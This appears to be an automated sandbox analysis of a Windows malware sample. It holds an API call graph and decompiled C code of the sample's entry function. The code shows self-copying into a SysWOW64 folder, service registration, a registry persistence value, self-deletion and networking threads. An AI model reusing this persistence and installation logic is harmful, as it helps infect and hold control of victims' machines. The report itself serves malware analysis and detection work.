21801->21810 21805 406c34 WriteFile 21802->21805 21806 406c2a 21802->21806 21804 40ec2e codecvt 4 API calls 21803->21804 21804->21810 21808 406c49 CloseHandle DeleteFileA 21805->21808 21809 406c5a CloseHandle 21805->21809 21807 40ec2e codecvt 4 API calls 21806->21807 21807->21810 21808->21806 21811 40ec2e codecvt 4 API calls 21809->21811 21810->21661 21811->21810 19813 416280 19814 416298 19813->19814 19816 41629d ___setargv _parse_cmdline 19813->19816 19815 41ad60 ___initmbctable LCMapStringW 19814->19815 19815->19816 19817 416f00 19818 416e30 __encode_pointer RtlEncodePointer 19817->19818 19819 416f0c 19818->19819 20995 41dc00 20996 41dc33 20995->20996 20998 41dc0f 20995->20998 20999 41da20 20996->20999 21000 41da34 __isleadbyte_l 20999->21000 21001 422a30 ___crtLCMapStringA LCMapStringW 21000->21001 21002 41da41 __isctype_l __chvalidator_l 21000->21002 21001->21002 21002->20998 21566 421280 21567 429980 ___InternalCxxFrameHandler RtlEncodePointer 21566->21567 21568 4212ac 21567->21568 21108 40f483 WSAStartup 21812 40f304 21815 40f26d setsockopt setsockopt setsockopt setsockopt setsockopt 21812->21815 21814 40f312 21815->21814 21827 405b84 IsBadWritePtr 21828 405b99 21827->21828 21829 405b9d 21827->21829 21830 404bd1 4 API calls 21829->21830 21831 405bcc 21830->21831 21832 405472 18 API calls 21831->21832 21833 405be5 21832->21833 21003 405c05 IsBadWritePtr 21004 405c24 IsBadWritePtr 21003->21004 21011 405ca6 21003->21011 21005 405c32 21004->21005 21004->21011 21006 405c82 21005->21006 21007 404bd1 4 API calls 21005->21007 21008 404bd1 4 API calls 21006->21008 21007->21006 21009 405c90 21008->21009 21012 405472 21009->21012 21031 404763 21012->21031 21014 405b58 21041 404699 21014->21041 21017 404763 lstrlenA 21018 405b6e 21017->21018 21062 404f9f 21018->21062 21020 405b79 21020->21011 21022 405549 lstrlenA 21030 40548a 21022->21030 21024 40558d lstrcpynA 21024->21030 21025 404ae6 8 API calls 21025->21030 21026 405a9f lstrcpyA 21026->21030 21027 405935 lstrcpynA 21027->21030 21028 405472 13 API calls 21028->21030 21029 4058e7 lstrcpyA 21029->21030 21030->21014 21030->21024 21030->21025 21030->21026 21030->21027 21030->21028 21030->21029 21035 404ae6 21030->21035 21039 40ef7c lstrlenA lstrlenA lstrlenA 21030->21039 21033 40477a 21031->21033 21032 404859 21032->21030 21033->21032 21034 40480d lstrlenA 21033->21034 21034->21033 21036 404af3 21035->21036 21038 404b03 21035->21038 21037 40ebed 8 API calls 21036->21037 21037->21038 21038->21022 21040 40efb4 21039->21040 21040->21030 21067 4045b3 21041->21067 21044 4045b3 7 API calls 21045 4046c6 21044->21045 21046 4045b3 7 API calls 21045->21046 21047 4046d8 21046->21047 21048 4045b3 7 API calls 21047->21048 21049 4046ea 21048->21049 21050 4045b3 7 API calls 21049->21050 21051 4046ff 21050->21051 21052 4045b3 7 API calls 21051->21052 21053 404711 21052->21053 21054 4045b3 7 API calls 21053->21054 21055 404723 21054->21055 21056 40ef7c 3 API calls 21055->21056 21057 404735 21056->21057 21058 40ef7c 3 API calls 21057->21058 21059 40474a 21058->21059 21060 40ef7c 3 API calls 21059->21060 21061 40475c 21060->21061 21061->21017 21063 404fac 21062->21063 21066 404fb0 21062->21066 21063->21020 21064 404ffd 21064->21020 21065 404fd5 IsBadCodePtr 21065->21066 21066->21064 21066->21065 21068 4045c1 21067->21068 21069 4045c8 21067->21069 21070 40ebcc 4 API calls 21068->21070 21071 40ebcc 4 API calls 21069->21071 21073 4045e1 21069->21073 21070->21069 21071->21073 21072 404691 21072->21044 21073->21072 21074 40ef7c 3 API calls 21073->21074 21074->21073 21084 404c0d 21085 404ae6 8 API calls 21084->21085 21086 404c17 21085->21086 21463 405e0d 21466 4050dc 21463->21466 21465 405e20 21467 404bd1 4 API calls 21466->21467 21468 4050f2 21467->21468 21469 404ae6 8 API calls 21468->21469 21470 4050ff 21469->21470 21471 405130 21470->21471 21472 404ae6 8 API calls 21470->21472 21476 404ae6 8 API calls 21470->21476 21473 404ae6 8 API calls 21471->21473 21474 405110 lstrcmpA 21472->21474 21475 405138 21473->21475 21474->21470 21474->21471 21477 40516e 21475->21477 21478 404ae6 8 API calls 21475->21478 21508 40513e 21475->21508 21476->21470 21480 404ae6 8 API calls 21477->21480 21477->21508 21479 40515e 21478->21479 21479->21477 21482 404ae6 8 API calls 21479->21482 21481 4051b6 21480->21481 21509 404a3d 21481->21509 21482->21477 21485 404ae6 8 API calls 21486 4051c7 21485->21486 21487 404ae6 8 API calls 21486->21487 21488 4051d7 21487->21488 21489 404ae6 8 API calls 21488->21489 21490 4051e7 21489->21490 21491 404ae6 8 API calls 21490->21491 21490->21508 21492 405219 21491->21492 21493 404ae6 8 API calls 21492->21493 21494 405227 21493->21494 21495 404ae6 8 API calls 21494->21495 21496 40524f lstrcpyA 21495->21496 21497 404ae6 8 API calls 21496->21497 21500 405263 21497->21500 21498 404ae6 8 API calls 21499 405315 21498->21499 21501 404ae6 8 API calls 21499->21501 21500->21498 21502 405323 21501->21502 21503 404ae6 8 API calls 21502->21503 21505 405331 21503->21505 21504 404ae6 8 API calls 21504->21505 21505->21504 21506 404ae6 8 API calls 21505->21506 21505->21508 21507 405351 lstrcmpA 21506->21507 21507->21505 21507->21508 21508->21465 21510 404a53 21509->21510 21511 404a4a 21509->21511 21513 404a78 21510->21513 21516 40ebed 8 API calls 21510->21516 21512 40ebed 8 API calls 21511->21512 21512->21510 21514 404aa3 21513->21514 21515 404a8e 21513->21515 21518 40ebed 8 API calls 21514->21518 21519 404a9b 21514->21519 21517 40ec2e codecvt 4 API calls 21515->21517 21515->21519 21516->21513 21517->21519 21518->21519 21519->21485 19820 417710 HeapCreate 19821 41773a ___sbh_heap_init __heap_init 19820->19821 21087 416010 21088 416028 21087->21088 21090 41602d _parse_cmdline 21087->21090 21089 41ad60 ___initmbctable LCMapStringW 21088->21089 21089->21090 21128 406511 wsprintfA IsBadReadPtr 21129 40656a htonl htonl wsprintfA wsprintfA 21128->21129 21130 40674e 21128->21130 21135 4065f3 21129->21135 21131 40e318 23 API calls 21130->21131 21132 406753 ExitProcess 21131->21132 21133 40668a GetCurrentProcess StackWalk64 21134 4066a0 wsprintfA 21133->21134 21133->21135 21136 4066ba 21134->21136 21135->21133 21135->21134 21137 406652 wsprintfA 21135->21137 21138 406712 wsprintfA 21136->21138 21139 4066da wsprintfA 21136->21139 21140 4066ed wsprintfA 21136->21140 21137->21135 21141 40e8a1 30 API calls 21138->21141 21139->21140 21140->21136 21142 406739 21141->21142 21143 40e318 23 API calls 21142->21143 21144 406741 21143->21144 21569 404e92 GetTickCount 21570 404ec0 InterlockedExchange 21569->21570 21571 404ec9 21570->21571 21572 404ead GetTickCount 21570->21572 21572->21571 21573 404eb8 Sleep 21572->21573 21573->21570 21427 405d93 IsBadWritePtr 21428 405ddc 21427->21428 21429 405da8 21427->21429 21429->21428 21430 405389 12 API calls 21429->21430 21430->21428 21816 408314 21817 40675c 21 API calls 21816->21817 21818 408324 21817->21818 21113 405099 21114 404bd1 4 API calls 21113->21114 21115 4050a2 21114->21115 19602 417020 19603 417032 __crt_wait_module_handle 19602->19603 19611 41703e __encode_pointer __initptd __mtterm 19603->19611 19612 416e30 19603->19612 19606 416e30 __encode_pointer RtlEncodePointer 19607 417141 19606->19607 19608 416e30 __encode_pointer RtlEncodePointer 19607->19608 19609 417155 19608->19609 19610 416e30 __encode_pointer RtlEncodePointer 19609->19610 19610->19611 19613 416e4b __crt_wait_module_handle 19612->19613 19614 416eb3 RtlEncodePointer 19613->19614 19615 416ebd 19613->19615 19614->19615 19615->19606 21520 405e21 21521 405e36 21520->21521 21522 405e29 21520->21522 21523 4050dc 17 API calls 21522->21523 21523->21521 21524 41ce20 21525 416f00 FindHandlerForForeignException RtlEncodePointer 21524->21525 21526 41ce34 21525->21526 21527 41ce6d __encode_pointer 21526->21527 21528 416e30 __encode_pointer RtlEncodePointer 21526->21528 21529 41ce9c 21528->21529 21530 416e30 __encode_pointer RtlEncodePointer 21529->21530 21531 41ceb9 21530->21531 21532 416e30 __encode_pointer RtlEncodePointer 21531->21532 21533 41ced6 21532->21533 21534 416e30 __encode_pointer RtlEncodePointer 21533->21534 21535 41cef9 21534->21535 21535->21527 21536 416e30 __encode_pointer RtlEncodePointer 21535->21536 21536->21527 21431 4035a5 21432 4030fa 4 API calls 21431->21432 21433 4035b3 21432->21433 21437 4035ea 21433->21437 21438 40355d 21433->21438 21435 4035da 21436 40355d 4 API calls 21435->21436 21435->21437 21436->21437 21439 40f04e 4 API calls 21438->21439 21440 40356a 21439->21440 21440->21435 21091 405029 21096 404a02 21091->21096 21097 404a12 21096->21097 21098 404a18 21096->21098 21099 40ec2e codecvt 4 API calls 21097->21099 21100 40ec2e codecvt 4 API calls 21098->21100 21101 404a26 21098->21101 21099->21098 21100->21101 21102 40ec2e codecvt 4 API calls 21101->21102 21103 404a34 21101->21103 21102->21103 21145 416930 21146 416976 21145->21146 21148 40c125 15 API calls 21146->21148 21147 4169c0 ___crtInitCritSecAndSpinCount 21148->21147 21537 40be31 lstrcmpiA 21538 40be55 lstrcmpiA 21537->21538 21543 40be71 21537->21543 21539 40be61 lstrcmpiA 21538->21539 21538->21543 21542 40bfc8 21539->21542 21539->21543 21540 40bf62 lstrcmpiA 21541 40bf77 lstrcmpiA 21540->21541 21545 40bf70 21540->21545 21544 40bf8c lstrcmpiA 21541->21544 21541->21545 21543->21540 21548 40ebcc 4 API calls 21543->21548 21544->21545 21545->21542 21546 40bfc2 21545->21546 21547 40ec2e codecvt 4 API calls 21545->21547 21549 40ec2e codecvt 4 API calls 21546->21549 21547->21545 21552 40beb6 21548->21552 21549->21542 21550 40ebcc 4 API calls 21550->21552 21551 40bf5a 21551->21540 21552->21540 21552->21542 21552->21550 21552->21551 21819 421330 21820 421345 21819->21820 21821 429980 ___InternalCxxFrameHandler RtlEncodePointer 21820->21821 21822 42136f 21821->21822 21149 405d34 IsBadWritePtr 21150 405d47 21149->21150 21151 405d4a 21149->21151 21154 405389 21151->21154 21155 404bd1 4 API calls 21154->21155 21156 4053a5 21155->21156 21157 404ae6 8 API calls 21156->21157 21160 4053ad 21157->21160 21158 405407 21159 404ae6 8 API calls 21159->21160 21160->21158 21160->21159 21161 40b535 21162 40b566 21161->21162 21163 40ebcc 4 API calls 21162->21163 21164 40b587 21163->21164 21165 40ebcc 4 API calls 21164->21165 21201 40b590 21165->21201 21166 40bdcd InterlockedDecrement 21167 40bde2 21166->21167 21169 40ec2e codecvt 4 API calls 21167->21169 21170 40bdea 21169->21170 21172 40ec2e codecvt 4 API calls 21170->21172 21171 40bdb7 Sleep 21171->21201 21173 40bdf2 21172->21173 21174 40be05 21173->21174 21176 40ec2e codecvt 4 API calls 21173->21176 21175 40bdcc 21175->21166 21176->21174 21177 40ebed 8 API calls 21177->21201 21180 40b6b6 lstrlenA 21180->21201 21181 4030b5 2 API calls 21181->21201 21182 40e819 11 API calls 21182->21201 21183 40b6ed lstrcpyA 21229 405ce1 21183->21229 21186 40b731 lstrlenA 21186->21201 21187 40b71f lstrcmpA 21187->21186 21187->21201 21188 40bd49 InterlockedIncrement 21317 40a628 21188->21317 21191 40b7ce InterlockedIncrement 21239 40acd7 21191->21239 21192 40bc5b InterlockedIncrement 21192->21201 21193 4038f0 6 API calls 21193->21201 21195 40b826 InterlockedIncrement 21195->21201 21196 40bcdc closesocket 21196->21201 21197 40bc6d InterlockedIncrement 21197->21201 21198 40a7c1 22 API calls 21198->21201 21200 40bba6 InterlockedIncrement 21200->21201 21201->21166 21201->21171 21201->21175 21201->21177 21201->21180 21201->21181 21201->21182 21201->21183 21201->21186 21201->21187 21201->21188 21201->21191 21201->21192 21201->21193 21201->21195 21201->21196 21201->21197 21201->21198 21201->21200 21202 40bc4c closesocket 21201->21202 21204 40ab81 lstrcpynA InterlockedIncrement 21201->21204 21206 405ce1 22 API calls 21201->21206 21207 40ba71 wsprintfA 21201->21207 21209 40ef1e lstrlenA 21201->21209 21210 405ded 12 API calls 21201->21210 21211 403e10 21201->21211 21214 403e4f 21201->21214 21217 40384f 21201->21217 21237 40a7a3 inet_ntoa 21201->21237 21244 40abee 21201->21244 21276 403cfb 21201->21276 21279 40b3c5 21201->21279 21310 40a51d 21201->21310 21202->21201 21204->21201 21206->21201 21256 40a7c1 21207->21256 21209->21201 21210->21201 21212 4030fa 4 API calls 21211->21212 21213 403e1d 21212->21213 21213->21201 21215 4030fa 4 API calls 21214->21215 21216 403e5c 21215->21216 21216->21201 21218 4030fa 4 API calls 21217->21218 21219 403863 21218->21219 21220 4038b9 21219->21220 21221 403889 21219->21221 21228 4038b2 21219->21228 21326 4035f9 21220->21326 21320 403718 21221->21320 21226 4035f9 6 API calls 21226->21228 21227 403718 6 API calls 21227->21228 21228->21201 21230 405cf4 21229->21230 21231 405cec 21229->21231 21233 404bd1 4 API calls 21230->21233 21232 404bd1 4 API calls 21231->21232 21232->21230 21234 405d02 21233->21234 21235 405472 18 API calls 21234->21235 21236 405d1c 21235->21236 21236->21201 21238 40a7b9 21237->21238 21238->21201 21240 40f315 14 API calls 21239->21240 21241 40aceb 21240->21241 21242 40acff 21241->21242 21243 40f315 14 API calls 21241->21243 21242->21201 21243->21242 21245 40abfb 21244->21245 21248 40ac65 21245->21248 21332 402f22 21245->21332 21247 40f315 14 API calls 21247->21248 21248->21247 21249 40ac8a 21248->21249 21250 40ac6f 21248->21250 21249->21201 21340 40ab81 21250->21340 21251 40ac23 21251->21248 21254 402684 2 API calls 21251->21254 21254->21251 21257 40a87d lstrlenA send 21256->21257 21258 40a7df 21256->21258 21259 40a899 21257->21259 21260 40a8bf 21257->21260 21258->21257 21265 40a7fa wsprintfA 21258->21265 21266 40a80a 21258->21266 21268 40a8f2 21258->21268 21263 40a8a5 wsprintfA 21259->21263 21269 40a89e 21259->21269 21261 40a8c4 send 21260->21261 21260->21268 21264 40a8d8 wsprintfA 21261->21264 21261->21268 21262 40a978 recv 21262->21268 21270 40a982 21262->21270 21263->21269 21264->21269 21265->21266 21266->21257 21267 40a9b0 wsprintfA 21267->21269 21268->21262 21268->21267 21268->21270 21269->21201 21270->21269 21271 4030b5 2 API calls 21270->21271 21272 40ab05 21271->21272 21273 40e819 11 API calls 21272->21273 21274 40ab17 21273->21274 21275 40a7a3 inet_ntoa 21274->21275 21275->21269 21277 4030fa 4 API calls 21276->21277 21278 403d0b 21277->21278 21278->21201 21280 405ce1 22 API calls 21279->21280 21281 40b3e6 21280->21281 21282 405ce1 22 API calls 21281->21282 21284 40b404 21282->21284 21283 40b440 21285 40ef7c 3 API calls 21283->21285 21284->21283 21286 40ef7c 3 API calls 21284->21286 21287 40b458 wsprintfA 21285->21287 21288 40b42b 21286->21288 21289 40ef7c 3 API calls 21287->21289 21290 40ef7c 3 API calls 21288->21290 21291 40b480 21289->21291 21290->21283 21292 40ef7c 3 API calls 21291->21292 21293 40b493 21292->21293 21294 40ef7c 3 API calls 21293->21294 21295 40b4bb 21294->21295 21359 40ad89 GetLocalTime SystemTimeToFileTime 21295->21359 21299 40b4cc 21300 40ef7c 3 API calls 21299->21300 21301 40b4dd 21300->21301 21302 40b211 7 API calls 21301->21302 21303 40b4ec 21302->21303 21304 40ef7c 3 API calls 21303->21304 21305 40b4fd 21304->21305 21306 40b211 7 API calls 21305->21306 21307 40b509 21306->21307 21308 40ef7c 3 API calls 21307->21308 21309 40b51a 21308->21309 21309->21201 21391 40a4c7 GetTickCount 21310->21391 21313 40a542 GetTickCount 21314 40a539 GetTickCount 21313->21314 21316 40a56c 21314->21316 21316->21201 21318 40a4c7 4 API calls 21317->21318 21319 40a633 21318->21319 21319->21201 21321 40f04e 4 API calls 21320->21321 21323 40372a 21321->21323 21322 403847 21322->21227 21322->21228 21323->21322 21324 4037b3 GetCurrentThreadId 21323->21324 21324->21323 21325 4037c8 GetCurrentThreadId 21324->21325 21325->21323 21327 40f04e 4 API calls 21326->21327 21331 40360c 21327->21331 21328 4036f1 21328->21226 21328->21228 21329 4036da GetCurrentThreadId 21329->21328 21330 4036e5 GetCurrentThreadId 21329->21330 21330->21328 21331->21328 21331->21329 21352 402d21 GetModuleHandleA 21332->21352 21335 402fcf GetProcessHeap HeapFree 21339 402f44 21335->21339 21336 402f4f 21338 402f6b GetProcessHeap HeapFree 21336->21338 21337 402f85 21337->21335 21337->21337 21338->21339 21339->21251 21341 40abe9 21340->21341 21343 40ab8c 21340->21343 21345 4038f0 21341->21345 21342 40aba8 lstrcpynA 21342->21343 21343->21341 21343->21342 21344 40abe1 InterlockedIncrement 21343->21344 21344->21343 21346 403900 21345->21346 21351 403980 21345->21351 21347 4030fa 4 API calls 21346->21347 21348 40390a 21347->21348 21349 40391b GetCurrentThreadId 21348->21349 21350 403939 GetCurrentThreadId 21348->21350 21348->21351 21349->21348 21350->21348 21351->21249 21353 402d46 LoadLibraryA 21352->21353 21354 402d5b GetProcAddress 21352->21354 21353->21354 21356 402d54 21353->21356 21354->21356 21358 402d6b 21354->21358 21355 402d97 GetProcessHeap HeapAlloc 21355->21356 21355->21358 21356->21336 21356->21337 21356->21339 21357 402db5 lstrcpynA 21357->21358 21358->21355 21358->21356 21358->21357 21360 40adbf 21359->21360 21384 40ad08 gethostname 21360->21384 21363 4030b5 2 API calls 21364 40add3 21363->21364 21365 40ade4 21364->21365 21366 40a7a3 inet_ntoa 21364->21366 21367 40ae85 wsprintfA 21365->21367 21369 40ae36 wsprintfA wsprintfA 21365->21369 21366->21365 21368 40ef7c 3 API calls 21367->21368 21370 40aebb 21368->21370 21371 40ef7c 3 API calls 21369->21371 21372 40ef7c 3 API calls 21370->21372 21371->21365 21373 40aed2 21372->21373 21374 40b211 21373->21374 21375 40b2bb FileTimeToLocalFileTime FileTimeToSystemTime 21374->21375 21376 40b2af GetLocalTime 21374->21376 21377 40b2d2 21375->21377 21376->21377 21378 40b2d9 SystemTimeToFileTime 21377->21378 21379 40b31c GetTimeZoneInformation 21377->21379 21380 40b2ec 21378->21380 21381 40b33a wsprintfA 21379->21381 21382 40b312 FileTimeToSystemTime 21380->21382 21381->21299 21382->21379 21385 40ad71 21384->21385 21386 40ad26 lstrlenA 21384->21386 21388 40ad85 21385->21388 21389 40ad79 lstrcpyA 21385->21389 21386->21385 21390 40ad68 lstrlenA 21386->21390 21388->21363 21389->21388 21390->21385 21392 40a4f7 InterlockedExchange 21391->21392 21393 40a500 21392->21393 21394 40a4e4 GetTickCount 21392->21394 21393->21313 21393->21314 21394->21393 21395 40a4ef Sleep 21394->21395 21395->21392 21441 41a5b4 21442 41a5bd 21441->21442 21443 41a5dc __setmbcp_nolock 21442->21443 21447 41a707 __setmbcp_nolock 21442->21447 21445 41aa20 setSBUpLow LCMapStringW 21443->21445 21444 41a6fd __setmbcp_nolock 21445->21444 21446 41aa20 setSBUpLow LCMapStringW 21446->21444 21447->21444 21447->21446

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00409A6B Relevance: 104.0, APIs: 48, Strings: 11, Instructions: 799stringsleepregistryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E00406511); // executed
				E0040EC54(); // executed
				_t475 =  *0x41201f; // 0x0
				if(_t475 != 0) {
					__eflags =  *0x4133d8; // 0x43
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0040405E, 0, 0, 0);
						__imp__#115(0x1010,  &_v1672);
						E0040E52E(_t449, __eflags);
						E0040EAAF(1, 0);
						E00401D96(_t438, 0x412118);
						E004080C9(_t438);
						CreateThread(0, 0, E0040877E, 0, 0, 0);
						E00405E6C(__eflags);
						E00403132();
						E0040C125(__eflags);
						E00408DB1(_t438);
						Sleep(0xbb8);
						E0040C4EE();
						while(1) {
							__eflags =  *0x4133d0; // 0x0
							if(__eflags == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x4133d0 - 0x109a0;
							if(_t239 -  *0x4133d0 < 0x109a0) {
								L131:
								Sleep(0x1a90);
								continue;
							}
							L129:
							_t238 = E0040C913();
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x4133d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x4133d8);
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0040EE2A(_t438, 0x4133d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0040EF00( &_v672,  &_v671);
						_t436 = E0040ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
						if(_t436 != 0) {
							 *_t436 = 0;
						}
					}
					_t248 = GetCommandLineA();
					_t459 = 0x4122f8;
					_a12 = _t248;
					_t250 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a48, 4, 0xe4, 0xc8));
					_t454 = 0x100;
					_v8 = _t250;
					E0040EE2A(_t438, 0x4122f8, 0, 0x100);
					_t467 = _t465 + 0x28;
					if(_v8 == 0) {
						_t257 = E004096AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112); // executed
						_t467 = _t467 + 0x14;
						_v16 = _t257;
						if(_t257 == 0) {
							E0040EF00("C:\\Windows\\SysWOW64\\ghrubsm\\pjzcupje.exe",  &_v672);
							_pop(_t438);
							_a12 = GetCommandLineA();
							_v8 = E0040EE95(_a12, E00402544(0x4122f8, 0x410a38, 4, 0xe4, 0xc8));
							E0040EE2A(_t438, 0x4122f8, 0, 0x100);
							_t468 = _t467 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								L102:
								_v8 = E0040EE95(_a12, E00402544(_t459, 0x410a28, 4, 0xe4, 0xc8));
								E0040EE2A(_t438, _t459, 0, _t454);
								_t467 = _t468 + 0x28;
								__eflags = _v8;
								if(_v8 == 0) {
									L110:
									_t267 = E00406EC3();
									__eflags = _t267;
									if(_t267 != 0) {
										E004098F2(_t438);
										L19:
										ExitProcess(0); // executed
									}
									__eflags = _v372;
									if(_v372 == 0) {
										L116:
										 *0x4133b0 = 0;
										L117:
										_v64.hProcess =  &_v372;
										_v64.hThread = E00409961;
										_v64.dwProcessId = 0;
										_v64.dwThreadId = 0;
										StartServiceCtrlDispatcherA( &_v64); // executed
										goto L19;
									}
									_t272 =  &_v372;
									_t449 = _t272 + 1;
									do {
										_t438 =  *_t272;
										_t272 = _t272 + 1;
										__eflags = _t438;
									} while (_t438 != 0);
									__eflags = _t272 - _t449 - 0x20;
									if(_t272 - _t449 >= 0x20) {
										goto L116;
									}
									E0040EF00("ghrubsm",  &_v372);
									_pop(_t438);
									goto L117;
								}
								_t459 = _v8 + 3;
								_t276 = E0040ED03(_t459, 0x20);
								_pop(_t438);
								__eflags = _t276;
								if(_t276 != 0) {
									L107:
									_t454 = _t276 - _t459;
									__eflags = _t454 - 0x20;
									if(_t454 >= 0x20) {
										_t454 = 0x1f;
									}
									E0040EE08(0x412184, _t459, _t454);
									_t467 = _t467 + 0xc;
									 *((char*)(_t454 + 0x412184)) = 0;
									goto L110;
								}
								_t279 = _t459;
								_t449 = _t279 + 1;
								do {
									_t438 =  *_t279;
									_t279 = _t279 + 1;
									__eflags = _t438;
								} while (_t438 != 0);
								_t276 = _t279 - _t449 + _t459;
								__eflags = _t276;
								goto L107;
							}
							_t282 = _v8 + 3;
							_v672 = 0;
							__eflags =  *_t282 - 0x22;
							_v20 = _t282;
							if( *_t282 != 0x22) {
								_t283 = E0040ED03(_v20, 0x20);
								_pop(_t438);
								__eflags = _t283;
								if(_t283 == 0) {
									_t283 =  &(_a12[lstrlenA(_a12)]);
									__eflags = _t283;
								}
								_t284 = _t283 - _v8;
								_v24 = _t284;
								__eflags = _t284 + 0xfffffffd;
								E0040EE08( &_v672, _v20, _t284 + 0xfffffffd);
								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
								L98:
								_t468 = _t468 + 0xc;
								L99:
								__eflags = _v672;
								if(_v672 != 0) {
									E0040EE08("C:\Users\hardz\Desktop\OcmKX57vR7.exe",  &_v672, 0x103);
									_t468 = _t468 + 0xc;
								}
								 *0x412cc0 = 1;
								goto L102;
							}
							_v20 = _v8 + 4;
							_t294 = E0040ED03(_v8 + 4, 0x22);
							_pop(_t438);
							__eflags = _t294;
							if(_t294 == 0) {
								goto L99;
							}
							_v24 = _t294 - _v8;
							E0040EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
							goto L98;
						}
						_v36 = 0;
						if(_t257 >= 4 || _v48 > 0x5e && _v44 != 0) {
							L84:
							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
								_t303 =  &_v672;
								if(_v672 == 0x22) {
									_t303 =  &_v671;
								}
								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
									_t303[3] = 0;
									_t304 = GetDriveTypeA(_t303);
									_t515 = _t304 - 2;
									if(_t304 != 2) {
										E00409145(_t515);
										_t438 = 1;
									}
								}
							}
							goto L19;
						} else {
							E00404280(_t438, 1);
							_pop(_t438);
							if(_v672 == 0) {
								goto L84;
							}
							_t309 = E0040675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							_v8 = _t309;
							if(_t309 == 0 || _v12 == 0) {
								goto L84;
							} else {
								_v32 = 0;
								_v28 = 0;
								if(_v16 == 2) {
									L55:
									__eflags = _v16 - 3;
									if(_v16 >= 3) {
										L83:
										E0040EC2E(_v8);
										_pop(_t438);
										if(_v36 != 0) {
											goto L19;
										}
										goto L84;
									}
									_t312 = E00402544(_t459, 0x410a3c, 0xc, 0xe4, 0xc8);
									_t469 = _t467 + 0x14;
									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
									if(__eflags == 0) {
										L82:
										E0040EE2A(_t438, _t459, 0, _t454);
										_t467 = _t469 + 0xc;
										goto L83;
									}
									_t318 = E004099D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
									_t469 = _t469 + 0x14;
									__eflags = _t318;
									if(_t318 == 0) {
										goto L82;
									}
									E0040EE2A(_t438, _t459, 0, _t454);
									_t470 = _t469 + 0xc;
									_v1272 = 0x22;
									lstrcpyA( &_v1271,  &_v672);
									_t324 = lstrlenA( &_v1272);
									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
									_t325 = _t324 + 1;
									__eflags = _v16 - 2;
									_a12 = _t325;
									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
									if(_v16 != 2) {
										L60:
										_push(0);
										_push( &_v112);
										_t328 = E00406DC2(_t438) ^ 0x5e5e5e5e;
										__eflags = _t328;
										_push(_t328);
										E0040F133();
										_t470 = _t470 + 0xc;
										L61:
										_t331 = E00402544(_t459,  &E004106AC, 0x2e, 0xe4, 0xc8);
										_t471 = _t470 + 0x14;
										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
										_v20 = _t332;
										__eflags = _t332;
										if(_t332 == 0) {
											_t373 =  &(_a12[1]);
											__eflags = _t373;
											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
											RegCloseKey(_v24);
										}
										E0040EE2A(_t438, _t459, 0, _t454);
										E0040EE2A(_t438,  &_v772, 0, 0x44);
										_v772.cb = 0x44;
										E0040EE2A(_t438,  &_v64, 0, 0x10);
										_t469 = _t471 + 0x24;
										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
										__eflags = _t340;
										if(_t340 != 0) {
											__eflags = _v372 - 0x22;
											_t357 =  &_v372;
											_v40 = _t357;
											if(_v372 == 0x22) {
												_t357 =  &_v371;
												_v40 = _t357;
											}
